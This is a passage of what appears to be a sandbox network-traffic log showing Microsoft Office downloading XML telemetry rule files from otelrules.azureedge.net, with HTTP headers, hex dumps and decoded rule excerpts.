                                                          2024-12-02 16:56:38 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          86192.168.2.44984313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:39 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:39 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:39 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 475
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                          ETag: "0x8DC582BBA740822"
                                                          x-ms-request-id: a0ab9ddc-d01e-00ad-54a3-43e942000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165639Z-174f7845968jrjrxhC1EWRmmrs00000014z00000000000t8
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:39 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          87192.168.2.44984413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:39 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:39 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:39 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                          ETag: "0x8DC582BB464F255"
                                                          x-ms-request-id: 8aad1780-e01e-0020-7ed6-43de90000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165639Z-174f784596886s2bhC1EWR743w00000014sg00000000bupe
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:39 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          88192.168.2.44984513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:39 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:39 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:39 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 474
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                          ETag: "0x8DC582BA4037B0D"
                                                          x-ms-request-id: 20bd7b2d-701e-001e-11a1-42f5e6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165639Z-174f7845968n2hr8hC1EWR9cag00000014b000000000fqxq
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:39 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          89192.168.2.44984613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:39 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:40 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:39 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 419
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                          ETag: "0x8DC582BA6CF78C8"
                                                          x-ms-request-id: 97ca64ed-201e-000c-5e6e-4379c4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165639Z-174f7845968vqt9xhC1EWRgten00000014ug000000005d33
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          90192.168.2.44984713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:39 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:40 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:40 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B984BF177"
                                                          x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165640Z-174f7845968cdxdrhC1EWRg0en00000014h000000000ygfp
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          91192.168.2.44984913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:41 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:41 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:41 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 405
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                          ETag: "0x8DC582B942B6AFF"
                                                          x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165641Z-174f7845968cpnpfhC1EWR3afc00000014bg00000000bst1
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:41 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          92192.168.2.44985013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:41 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:41 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:41 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                          ETag: "0x8DC582BBA642BF4"
                                                          x-ms-request-id: e27289f3-201e-0003-0c15-42f85a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165641Z-174f7845968glpgnhC1EWR7uec00000014x0000000009hxw
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          93192.168.2.44985113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:41 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:41 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:41 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 174
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                          ETag: "0x8DC582B91D80E15"
                                                          x-ms-request-id: 8c2ab7fe-e01e-0003-5b91-3f0fa8000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165641Z-174f7845968xr5c2hC1EWRd0hn0000000pfg00000000qdx6
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:41 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.44985213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:41 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:42 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:42 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 1952
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                          ETag: "0x8DC582B956B0F3D"
                                                          x-ms-request-id: b5b05efe-701e-0001-4ea6-43b110000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165642Z-174f7845968frfdmhC1EWRxxbw00000014u000000000820a
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:42 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.44985313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:42 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:42 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:42 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 958
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                          ETag: "0x8DC582BA0A31B3B"
                                                          x-ms-request-id: c668448b-101e-007a-2d91-3f047e000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165642Z-174f7845968zgtf6hC1EWRqd8s0000000xn000000000ktcc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:42 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.44985413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:43 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:43 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:43 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 501
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                          ETag: "0x8DC582BACFDAACD"
                                                          x-ms-request-id: f418fe9b-801e-0047-5281-3f7265000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165643Z-174f7845968kvnqxhC1EWRmf3g0000000rh000000000bxde
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
